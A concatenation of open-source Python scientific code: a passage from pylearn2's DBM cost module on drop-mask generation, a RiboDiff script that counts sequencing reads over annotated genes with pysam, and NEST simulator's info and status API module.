            flip = theano_rng.binomial(
                size=(batch_size,),
                p=0.5,
                n=1,
                dtype=X.dtype)
yp = flip * (1 - p) + (1 - flip) * p
dimshuffle_args = ['x'] * X.ndim
if X.ndim == 2:
dimshuffle_args[0] = 0
assert not self.sync_channels
else:
dimshuffle_args[X_space.axes.index('b')] = 0
if self.sync_channels:
del dimshuffle_args[X_space.axes.index('c')]
flip = flip.dimshuffle(*dimshuffle_args)
p = flip * (1 - p) + (1 - flip) * p
# size needs to have a fixed length at compile time or the
# theano random number generator will be angry
        size = [X.shape[i] for i in xrange(X.ndim)]
        if self.sync_channels:
            # a tuple would not support `del`, so build the size as a list
            # and convert it just before use
            del size[X_space.axes.index('c')]
        size = tuple(size)
drop_mask = theano_rng.binomial(
size=size,
p=p,
n=1,
dtype=X.dtype)
X_name = make_name(X, 'anon_X')
drop_mask.name = 'drop_mask(%s)' % X_name
if Y is not None:
assert isinstance(yp, float) or yp.ndim < 2
            drop_mask_Y = theano_rng.binomial(
                size=(batch_size, ),
                p=yp,
                n=1,
                dtype=X.dtype)
assert drop_mask_Y.ndim == 1
Y_name = make_name(Y, 'anon_Y')
drop_mask_Y.name = 'drop_mask_Y(%s)' % Y_name
return drop_mask, drop_mask_Y
return drop_mask
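# --- Editor's usage sketch (illustrative, not part of the original file).
# Assumes a flat VectorSpace input, where per-unit masking applies:
#     import theano.tensor as T
#     from pylearn2.space import VectorSpace
#     mask_gen = MaskGen(drop_prob=0.5, balance=True, sync_channels=False)
#     X = T.matrix('X')
#     drop_mask = mask_gen(X, X_space=VectorSpace(dim=784))
# drop_mask is a symbolic batch of the same shape as X; entries equal to 1
# mark the units that inference must inpaint.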
|
JazzeYoung/VeryDeepAutoEncoder
|
pylearn2/pylearn2/costs/dbm.py
|
Python
|
bsd-3-clause
| 68,703
|
[
"Gaussian"
] |
d2bf88fcd4c6adb3523ba5dfb67dbb01b52639afd68b33557e6d7db73bf8b5e5
|
#!/usr/bin/env python
"""
Counting the number of reads spanning over an annotated genomic feature
Requirement:
pysam:
"""
import os
import re
import sys
import pdb
import time
import array
import pysam
import cPickle
def parse_options(argv):
"""
Parses options from the command line
"""
from optparse import OptionParser, OptionGroup
parser = OptionParser()
required = OptionGroup(parser, 'REQUIRED')
required.add_option('-a', '--annotation', dest='anno', metavar='FILE', help='annotation file in GTF/GFF3 format', default='-')
    required.add_option('-o', '--outfile', dest='outfile', metavar='FILE', help='outfile to store counts in tab delimited format [stdout]', default='-')
required.add_option('-A', '--alignment', dest='alignment', metavar='FILE', help='alignment in sam or bam format [stdin - sam]', default='-')
optional = OptionGroup(parser, 'OPTIONAL')
optional.add_option('-f', '--fields', dest='fields', metavar='STRING', help='annotation fields [exon], comma separated', default='exon')
optional.add_option('-b', '--bam_force', dest='bam_force', action='store_true', help='force BAM as input even if file ending is different from .bam - does not work for STDIN', default=False)
optional.add_option('-B', '--best_only', dest='best_only', action='store_true', help='count only the best alignment per read [off]', default=False)
optional.add_option('-v', '--verbose', dest='verbose', action='store_true', help='verbosity', default=False)
parser.add_option_group(required)
parser.add_option_group(optional)
(options, args) = parser.parse_args()
if len(argv) < 2:
parser.print_help()
sys.exit(2)
return options
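### Editor's example invocation (hypothetical file names, not part of the
### original script):
###     python count_reads.py -a genes.gff3 -A sample.bam -o counts.tsv -v
### Several alignment files may be passed to -A, comma separated.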
def parse_anno_from_gff3(options, contigs):
"""
This function reads the gff3 input file and returns the information in an
internal data structure
"""
anno = dict()
idx2gene = dict()
gene2idx = dict()
if options.verbose:
print >> sys.stderr, "Parsing annotation from %s ..." % options.anno
### initial run to get the transcript to gene mapping
if options.verbose:
print >> sys.stderr, "... init structure"
trans2gene = dict()
for line in open(options.anno, 'r'):
if line[0] == '#':
continue
sl = line.strip().split('\t')
if sl[2] in ['mRNA', 'transcript']:
tags=sl[8].split(';')
tags[0] = tags[0].replace("transcript", "")
tags[0] = tags[0].replace("mRNA", "")
tags[1] = tags[1].replace("gene", "")
key_vals = dict()
for at in tags:
key, vals = at.split('=')
key_vals[key] = vals
#assert(tags[0][:2] == 'ID')
#assert(tags[1][:6] == 'Parent')
#trans2gene[tags[0][3:]] = tags[1][7:]
if key_vals.has_key('ID'):
child = key_vals['ID']
if key_vals.has_key('Parent'):
parent = key_vals['Parent']
trans2gene[child] = parent
### init genome structure
for c in contigs:
if options.verbose:
            print >> sys.stderr, 'reserving memory for chr %s of len %s' % (c, contigs[c])
anno[c] = array.array('H', '\x00\x00' * (contigs[c] + 1))
### init list of considered GFF fields
fields = options.fields.split(',')
### generate a list of exons with attached gene/transcript information
    ### one list per chromosome
counter = 1
gene_counter = 1
t0 = time.time()
for line in open(options.anno, 'r'):
if options.verbose and counter % 10000 == 0:
print >> sys.stderr, '.',
if counter % 100000 == 0:
t1 = time.time() - t0
print >> sys.stderr, "%i - took %.2f secs" % (counter, t1)
t0 = time.time()
counter += 1
if line[0] == '#':
continue
sl = line.strip().split('\t')
if not sl[2] in fields:
continue
tags = sl[8].split(';')
key_vals = dict()
if sl[2] == 'exon':
tags[0] = tags[0].replace("exon", "")
for at in tags:
key, vals = at.split('=')
key_vals[key] = vals
if key_vals.has_key('Parent'):
trans_id = key_vals['Parent']
                try:
                    gene_id = trans2gene[trans_id]
                except KeyError:
                    print >> sys.stderr, 'Currently only >mRNA, transcript< parents are supported'
                    sys.exit(1)
else:
print >> sys.stderr, 'Currently only >exon< is supported'
sys.exit(1)
if not gene2idx.has_key(gene_id):
gene2idx[gene_id] = gene_counter
idx2gene[gene_counter] = gene_id
gene_counter += 1
### store for each position of the transcriptome one gene id
anno[sl[0]][int(sl[3]):int(sl[4]) + 1] = array.array('H', [gene2idx[gene_id]] * (int(sl[4]) + 1 - int(sl[3])))
if options.verbose:
print >> sys.stderr, "... done"
"""
if options.verbose:
print >> sys.stderr, "Dumping exon array ..."
### sparsify and dump annotation
dump_info = open(options.anno + '.dump.info', 'w')
for k in anno.keys():
if options.verbose:
print >> sys.stderr, "... %s" % k
out_fn = options.anno + '.' + k + '.dump'
anno[k].tofile(open(out_fn, 'w'))
print >> dump_info, "%s\t%s\t%i" % (k, out_fn, len(anno[k]))
dump_info.close()
if options.verbose:
print >> sys.stderr, "... pickling gene ID map"
cPickle.dump(idx2gene, open(options.anno + '.pickle', 'w'))
if options.verbose:
print >> sys.stderr, "... done"
"""
return (anno, idx2gene)
def parse_anno_from_gtf(options, contigs):
"""
This function reads the gtf input file and returns the information in an
internal data structure
"""
anno = dict()
idx2gene = dict()
gene2idx = dict()
if options.verbose:
print >> sys.stderr, "Parsing annotation from %s ..." % options.anno
### init genome structure
for c in contigs:
if options.verbose:
            print >> sys.stderr, 'reserving memory for chr %s of len %s' % (c, contigs[c])
anno[c] = array.array('H', '\x00\x00' * (contigs[c] + 1))
### init list of considered GFF fields
fields = options.fields.split(',')
### generate a list of exons with attached gene/transcript information
    ### one list per chromosome
counter = 1
gene_counter = 1
t0 = time.time()
for line in open(options.anno, 'r'):
if options.verbose and counter % 10000 == 0:
print >> sys.stderr, '.',
if counter % 100000 == 0:
t1 = time.time() - t0
print >> sys.stderr, "%i - took %.2f secs" % (counter, t1)
t0 = time.time()
counter += 1
if line[0] == '#':
continue
sl = line.strip().split('\t')
if not sl[2] in fields:
continue
tags = sl[8].split(';')
gene_id = tags[0][9:-1]
#transcript_id = '' # tags[1][16:-1]
if not gene2idx.has_key(gene_id):
gene2idx[gene_id] = gene_counter
idx2gene[gene_counter] = gene_id
gene_counter += 1
### store for each position of the transcriptome one gene id
anno[sl[0]][int(sl[3]):int(sl[4]) + 1] = array.array('H', [gene2idx[gene_id]] * (int(sl[4]) + 1 - int(sl[3])))
if options.verbose:
print >> sys.stderr, "... done"
"""
if options.verbose:
print >> sys.stderr, "Dumping exon array ..."
### sparsify and dump annotation
dump_info = open(options.anno + '.dump.info', 'w')
for k in anno.keys():
if options.verbose:
print >> sys.stderr, "... %s" % k
out_fn = options.anno + '.' + k + '.dump'
anno[k].tofile(open(out_fn, 'w'))
print >> dump_info, "%s\t%s\t%i" % (k, out_fn, len(anno[k]))
dump_info.close()
if options.verbose:
print >> sys.stderr, "... pickling gene ID map"
cPickle.dump(idx2gene, open(options.anno + '.pickle', 'w'))
if options.verbose:
print >> sys.stderr, "... done"
"""
return (anno, idx2gene)
def read_header(options, infile):
"""Parses the alignment header and extracts contig information"""
contigs = dict()
line = ''
if options.is_bam:
for i in range(len(infile.references)):
if contigs.has_key(infile.references[i]):
if not contigs[infile.references[i]] == infile.lengths[i]:
print >> sys.stderr, "Headers in BAM files have inconsistent contig lengths. Stopping ..."
sys.exit(1)
else:
contigs[infile.references[i]] = infile.lengths[i]
else:
for line in infile:
if not line[0] == '@':
if len(contigs) == 0:
print >> sys.stderr, "No header found in %s. Stopping." % file
sys.exit(1)
else:
break
sl = line.strip().split('\t')
if not sl[0] == '@SQ':
continue
if contigs.has_key(sl[1][3:]):
if not contigs[sl[1][3:]] == int(sl[2][3:]):
print >> sys.stderr, "Headers in BAM files have inconsistent contig lengths. Stopping ..."
sys.exit(1)
else:
contigs[sl[1][3:]] = int(sl[2][3:])
return (contigs, line)
def compress_counts(count_list, genes):
"""Takes a list of gene IDs and compresses them to a list of tuples"""
a = 0
g = 0
compressed_list = []
print >> sys.stderr, " [compressing gene list] ",
while g < len(genes):
while g < len(genes) and (a == len(count_list) or genes[g] < count_list[a]):
g += 1
if g < len(genes):
b = a
while a < len(count_list) and genes[g] == count_list[a]:
a += 1
compressed_list.append([genes[g], a - b])
g += 1
return compressed_list
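### Editor's worked example (not part of the original script): with
### genes = [1, 2, 3] and count_list = [2, 2, 2, 3] (both sorted), the two
### pointers walk the lists in lockstep and the function returns
### [[2, 3], [3, 1]]: gene 2 was hit three times, gene 3 once. Gene 1 is
### skipped here and is written out with a zero count later in main().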
def check_file_type(gff_fname):
"""
check the file type
"""
is_gff = False
for line in open(gff_fname, 'r'):
if line[0] == '#':
continue
line = line.strip('\n\r').split('\t')
try:
col9 = line[8]
except:
return is_gff
col9 = col9.rstrip(';| ')
atbs = col9.split(" ; ")
if len(atbs) == 1:
atbs = col9.split("; ")
if len(atbs) ==1:
atbs = col9.split(";")
gff3_pat = re.compile("\w+=")
#gtf_pat = re.compile("\s?\w+\s")
if gff3_pat.match(atbs[0]):
is_gff = True
break
return is_gff
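### Editor's note (illustrative): the decision rests on column 9 of the
### annotation. GFF3 uses key=value attributes, e.g.
###     ID=transcript:ENST00000456328;Parent=gene:ENSG00000223972
### whereas GTF uses key "value" pairs, e.g.
###     gene_id "ENSG00000223972"; transcript_id "ENST00000456328";
### so an attribute matching the pattern \w+= identifies GFF3.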
def main():
"""Main Program Procedure"""
options = parse_options(sys.argv)
contigs = dict()
time_total = time.time()
### iterate over alignment file(s)
for file in options.alignment.split(','):
options.is_bam = False
### open file stream
if file == '-':
infile = sys.stdin
        elif file.endswith('.bam') or options.bam_force:
try:
infile = pysam.Samfile(file, 'rb')
options.is_bam = True
except:
print 'NOT able to read the alignment file %s' % file
continue
else:
infile = open(file, 'r')
if options.verbose:
            if file == '-':
                print >> sys.stderr, "Reading alignment from stdin\n"
            else:
                print >> sys.stderr, "Reading alignment from %s\n" % file
### get contigs from alignment data
if len(contigs) == 0:
(contigs, lastline) = read_header(options, infile)
### TODO handle lastline (line after header) for SAM input
### check if we have a version on disk
if os.path.isfile(options.anno + '.pickle') and os.path.isfile(options.anno + '.dump.info'):
if options.verbose:
t0 = time.time()
print >> sys.stderr, 'Loading annotation from pickle/dump files ...'
idx2gene = cPickle.load(open(options.anno + '.pickle', 'r'))
anno = dict()
info_file = open(options.anno + '.dump.info', 'r')
for line in info_file:
sl = line.strip().split('\t')
anno[sl[0]] = array.array('H')
anno[sl[0]].fromfile(open(sl[1], 'r'), int(sl[2]))
if options.verbose:
t1 = time.time() - t0
print >>sys.stderr, "... %s took %i secs" % (sl[0], t1)
t0 = time.time()
info_file.close()
if options.verbose:
t1 = time.time() - t0
print >> sys.stderr, "... done - last took %i secs" % t1
else:
is_gff = check_file_type(options.anno)
if is_gff:
                print >> sys.stderr, 'Annotation file detected as GFF3'
### read annotation from GFF3
(anno, idx2gene) = parse_anno_from_gff3(options, contigs)
else:
### read annotation from GTF
(anno, idx2gene) = parse_anno_from_gtf(options, contigs)
### count reads
counter = 1
t0 = time.time()
tmp_count = []
compressed_counts = []
genes = sorted(idx2gene.keys())
for line in infile:
if counter % 100000 == 0:
print >> sys.stderr, '.',
if counter % 1000000 == 0:
if len(tmp_count) > 5000000:
compressed_counts.extend(compress_counts(sorted(tmp_count), genes))
tmp_count = []
t1 = time.time() - t0
print >> sys.stderr, '%i (last 1000000 took %.2f secs)' % (counter, t1)
t0 = time.time()
counter += 1
if options.is_bam:
#chrm = infile.getrname(line.tid).replace('chr', '')
chrm = infile.getrname(line.tid)
pos = line.pos
broken = False
if line.is_unmapped:
continue
if options.best_only and line.is_secondary:
continue
for o in line.cigar:
if o[0] in [0, 2]:
for p in range(o[1]):
try:
g = anno[chrm][pos + p]
if g > 0:
tmp_count.append(g)
break
except KeyError:
continue
                            except IndexError:
                                if chrm in ['chrM', 'M', 'chrM_rCRS']:
                                    continue
                                else:
                                    print >> sys.stderr, 'ERROR: %i exceeds length of %s' % (pos + p, chrm)
                                    broken = True
                                    break
if broken:
break
if not o[0] in [1, 5]:
pos += o[1]
else:
sl = line.strip().split('\t')
if len(sl) < 9:
print >> sys.stderr, "ERROR: invalid SAM line\n%s" % line
sys.exit(1)
(size, op) = (re.split('[^0-9]', sl[5])[:-1], re.split('[0-9]*', sl[5])[1:])
size = [int(i) for i in size]
#chrm = sl[2].replace('chr', '')
chrm = sl[2]
pos = int(sl[3]) - 1
broken = False
## is unmapped ?
if (int(sl[1]) & 4) == 4:
continue
## is secondary ?
if options.best_only and (int(sl[1]) & 256 == 256):
continue
for o in range(len(op)):
if op[o] in ['M', 'D']:
for p in range(size[o]):
try:
g = anno[chrm][pos + p]
if g > 0:
tmp_count.append(g)
break
except KeyError:
continue
                            except IndexError:
                                if chrm in ['chrM', 'M', 'chrM_rCRS']:
                                    continue
                                else:
                                    print >> sys.stderr, 'ERROR: %i exceeds length of %s' % (pos + p, chrm)
                                    broken = True
                                    break
if broken:
break
if not op[o] in ['H', 'I']:
pos += size[o]
### close file stream
if not file == '-':
infile.close()
### compress remaining counts
compressed_counts.extend(compress_counts(sorted(tmp_count), genes))
tmp_count = []
### report counts to outfile
outfile = open(options.outfile, 'w')
print >> sys.stderr, "Sorting and condensing compressed list ..."
t0 = time.time()
    compressed_counts = sorted(compressed_counts, key=lambda x: x[0])
for i in range(1, len(compressed_counts)):
if compressed_counts[i-1][0] == compressed_counts[i][0]:
compressed_counts[i][1] += compressed_counts[i-1][1]
compressed_counts[i-1][1] = -1
compressed_counts = filter(lambda x: x[1] >= 0, compressed_counts)
t1 = time.time() - t0
print >> sys.stderr, "... done. took %.2f secs" % t1
if options.verbose:
print >> sys.stderr, "Summarizing gene counts ..."
a = 0
g = 0
    ### seek to first position that mapped to a gene (0 means no gene found)
while g < len(genes):
while g < len(genes) and (a == len(compressed_counts) or genes[g] < compressed_counts[a][0]):
print >> outfile, '%s\t0' % idx2gene[genes[g]]
if options.verbose and g % 100 == 0:
print >> sys.stderr, "%.2f / 100 percent \r" % (float(g) / len(genes) * 100),
g += 1
while a < len(compressed_counts) and g < len(genes) and genes[g] == compressed_counts[a][0]:
print >> outfile, '%s\t%i' % (idx2gene[genes[g]], compressed_counts[a][1])
a += 1
g += 1
if options.verbose and g % 100 == 0:
print >> sys.stderr, "%.2f / 100 percent \r" % (float(g) / len(genes) * 100),
if options.verbose:
t1 = time.time() - time_total
print >> sys.stderr, "\n... done - total run took %i secs." % t1
outfile.close()
if __name__ == "__main__":
main()
|
vipints/oqtans
|
oqtans_tools/RiboDiff/0.1/tools/count_reads.py
|
Python
|
bsd-3-clause
| 19,291
|
[
"pysam"
] |
936cdea36257e5e96d51ac35517fdd631fc0a235a18093d10268ef46dadfeef0
|
# -*- coding: utf-8 -*-
#
# hl_api_info.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Functions to get information on NEST.
"""
import sys
import os
import webbrowser
from ..ll_api import *
from .hl_api_helper import *
import nest
__all__ = [
'authors',
'get_argv',
'GetStatus',
'get_verbosity',
'help',
'helpdesk',
'message',
'SetStatus',
'set_verbosity',
'sysinfo',
'version',
]
@check_stack
def sysinfo():
"""Print information on the platform on which NEST was compiled.
"""
sr("sysinfo")
@check_stack
def version():
"""Return the NEST version.
Returns
-------
str
The version of NEST
"""
sr("statusdict [[ /kernelname /version ]] get")
return " ".join(spp())
@check_stack
def authors():
"""Print the authors of NEST.
"""
sr("authors")
@check_stack
def helpdesk():
"""Open the NEST helpdesk in browser.
Use the system default browser.
"""
if sys.version_info < (2, 7, 8):
print("The NEST helpdesk is only available with Python 2.7.8 or "
"later. \n")
return
if 'NEST_DOC_DIR' not in os.environ:
print(
            'NEST help needs to know where NEST is installed. '
            'Please source nest_vars.sh or define NEST_DOC_DIR manually.')
return
helpfile = os.path.join(os.environ['NEST_DOC_DIR'], 'help',
'helpindex.html')
# Under Windows systems webbrowser.open is incomplete
# See <https://bugs.python.org/issue8232>
if sys.platform[:3] == "win":
os.startfile(helpfile)
# Under MacOs we need to ask for the browser explicitly.
# See <https://bugs.python.org/issue30392>.
if sys.platform[:3] == "dar":
webbrowser.get('safari').open_new(helpfile)
else:
webbrowser.open_new(helpfile)
@check_stack
def help(obj=None, pager=None, return_text=False):
"""Show the help page for the given object using the given pager.
    The default pager is `more` (see `.nestrc`).
Parameters
----------
obj : object, optional
Object to display help for
pager : str, optional
Pager to use
return_text : bool, optional
Option for returning the help text
Returns
-------
None or str
The help text of the object if `return_text` is `True`.
"""
hlpobj = obj
if hlpobj is not None:
if return_text:
return load_help(hlpobj)
else:
show_help_with_pager(hlpobj, pager)
else:
print("Type 'nest.helpdesk()' to access the online documentation "
"in a browser.")
print("Type 'nest.help(object)' to get help on a NEST object or "
"command.\n")
print("Type 'nest.Models()' to see a list of available models "
"in NEST.")
print("Type 'nest.authors()' for information about the makers "
"of NEST.")
print("Type 'nest.sysinfo()' to see details on the system "
"configuration.")
print("Type 'nest.version()' for information about the NEST "
"version.\n")
print("For more information visit https://www.nest-simulator.org.")
@check_stack
def get_argv():
"""Return argv as seen by NEST.
This is similar to Python :code:`sys.argv` but might have changed after
MPI initialization.
Returns
-------
tuple
Argv, as seen by NEST
"""
sr('statusdict')
statusdict = spp()
return statusdict['argv']
@check_stack
def message(level, sender, text):
"""Print a message using message system of NEST.
Parameters
----------
level :
Level
sender :
Message sender
text : str
Text to be sent in the message
"""
sps(level)
sps(sender)
sps(text)
sr('message')
@check_stack
def get_verbosity():
"""Return verbosity level of NEST's messages.
- M_ALL=0, display all messages
- M_INFO=10, display information messages and above
- M_DEPRECATED=18, display deprecation warnings and above
- M_WARNING=20, display warning messages and above
- M_ERROR=30, display error messages and above
- M_FATAL=40, display failure messages and above
Returns
-------
int:
The current verbosity level
"""
sr('verbosity')
return spp()
@check_stack
def set_verbosity(level):
"""Change verbosity level for NEST's messages.
- M_ALL=0, display all messages
- M_INFO=10, display information messages and above
- M_DEPRECATED=18, display deprecation warnings and above
- M_WARNING=20, display warning messages and above
- M_ERROR=30, display error messages and above
- M_FATAL=40, display failure messages and above
Parameters
----------
level : str
Can be one of 'M_FATAL', 'M_ERROR', 'M_WARNING', 'M_DEPRECATED',
'M_INFO' or 'M_ALL'.
"""
sr("{} setverbosity".format(level))
@check_stack
def SetStatus(nodes, params, val=None):
"""Set parameters of nodes or connections.
    Parameters of nodes or connections, given in `nodes`, are set as specified
    by `params`. If `val` is given, `params` has to be a string with the
    name of an attribute, which is set to `val` on the nodes/connections. `val`
    can be a single value or a list of the same size as `nodes`.
Parameters
----------
nodes : NodeCollection or SynapseCollection
Either a `NodeCollection` representing nodes, or a `SynapseCollection`
of connection handles as returned by
:py:func:`.GetConnections()`.
params : str or dict or list
Dictionary of parameters or list of dictionaries of parameters
of same length as `nodes`. If `val` is given, this has to be
the name of a model property as a str.
val : int, list, optional
If given, params has to be the name of a model property.
Raises
------
    TypeError
        If `nodes` is not a NodeCollection of nodes or a SynapseCollection of
        synapses, or if the number of parameters doesn't match the number of
        nodes or synapses.
    See Also
    --------
GetStatus
"""
if not isinstance(nodes, (nest.NodeCollection, nest.SynapseCollection)):
raise TypeError("'nodes' must be NodeCollection or a SynapseCollection.")
# This was added to ensure that the function is a nop (instead of,
# for instance, raising an exception) when applied to an empty
# list, which is an artifact of the API operating on lists, rather
# than relying on language idioms, such as comprehensions
if len(nodes) == 0:
return
n0 = nodes[0]
params_is_dict = isinstance(params, dict)
set_status_nodes = isinstance(nodes, nest.NodeCollection)
set_status_local_nodes = set_status_nodes and n0.get('local')
if (params_is_dict and set_status_local_nodes):
contains_list = [is_iterable(vals) and not is_iterable(n0.get(key))
for key, vals in params.items()]
if any(contains_list):
temp_param = [{} for _ in range(len(nodes))]
for key, vals in params.items():
if not is_iterable(vals):
for temp_dict in temp_param:
temp_dict[key] = vals
else:
for i, temp_dict in enumerate(temp_param):
temp_dict[key] = vals[i]
params = temp_param
if val is not None and is_literal(params):
if is_iterable(val) and not isinstance(val, (uni_str, dict)):
params = [{params: x} for x in val]
else:
params = {params: val}
if isinstance(params, (list, tuple)) and len(nodes) != len(params):
raise TypeError(
"status dict must be a dict, or a list of dicts of length "
"len(nodes)")
if isinstance(nodes, nest.SynapseCollection):
params = broadcast(params, len(nodes), (dict,), "params")
sps(nodes)
sps(params)
sr('2 arraystore')
sr('Transpose { arrayload pop SetStatus } forall')
else:
sli_func('SetStatus', nodes, params)
@check_stack
def GetStatus(nodes, keys=None, output=''):
"""Return the parameter dictionaries of nodes or connections.
If `keys` is given, a list of values is returned instead. `keys` may
also be a list, in which case the returned list contains lists of
values.
Parameters
----------
nodes : NodeCollection or SynapseCollection
Either a `NodeCollection` representing nodes, or a `SynapseCollection` of
connection handles as returned by :py:func:`.GetConnections()`.
keys : str or list, optional
string or a list of strings naming model properties.
`GetStatus` then returns a single value or a list of values
belonging to the keys given.
output : str, optional
Whether the returned data should be in a selected format
(``output='json'``).
Returns
-------
dict :
All parameters
    type :
        If `keys` is a string, the corresponding parameter is returned.
    list :
        If `keys` is a list of strings, a list of corresponding parameters is returned.
    str :
        If `output` is `json`, the parameters are returned in JSON format.
Raises
------
TypeError
        If `nodes` or `keys` are of the wrong form.
See Also
--------
SetStatus
"""
if not (isinstance(nodes, nest.NodeCollection) or isinstance(nodes, nest.SynapseCollection)):
raise TypeError("The first input (nodes) must be NodeCollection or a SynapseCollection with connection handles")
if len(nodes) == 0:
return nodes
if keys is None:
cmd = 'GetStatus'
elif is_literal(keys):
cmd = 'GetStatus {{ /{0} get }} Map'.format(keys)
elif is_iterable(keys):
keys_str = " ".join("/{0}".format(x) for x in keys)
cmd = 'GetStatus {{ [ [ {0} ] ] get }} Map'.format(keys_str)
else:
raise TypeError("keys should be either a string or an iterable")
sps(nodes)
sr(cmd)
result = spp()
if isinstance(result, dict):
# We have taken GetStatus on a layer object, or another NodeCollection with metadata, which returns a
# dictionary from C++, so we need to turn it into a tuple for consistency.
result = (result,)
if output == 'json':
result = to_json(result)
return result
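# --- Editor's usage sketch (illustrative, not part of the original module;
# 'iaf_psc_alpha' is a stock NEST neuron model):
#     import nest
#     neurons = nest.Create('iaf_psc_alpha', 3)
#     nest.SetStatus(neurons, {'V_m': -70.0})                 # one dict for all
#     nest.SetStatus(neurons, 'V_m', [-70.0, -65.0, -60.0])   # key + value list
#     nest.GetStatus(neurons, 'V_m')   # -> (-70.0, -65.0, -60.0)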
|
janhahne/nest-simulator
|
pynest/nest/lib/hl_api_info.py
|
Python
|
gpl-2.0
| 11,191
|
[
"VisIt"
] |
6ff89ead12ab3ee7c2c4418ae4a0dcbf0a9e68b6e13f29ce02cd7f0fe79a56e3
|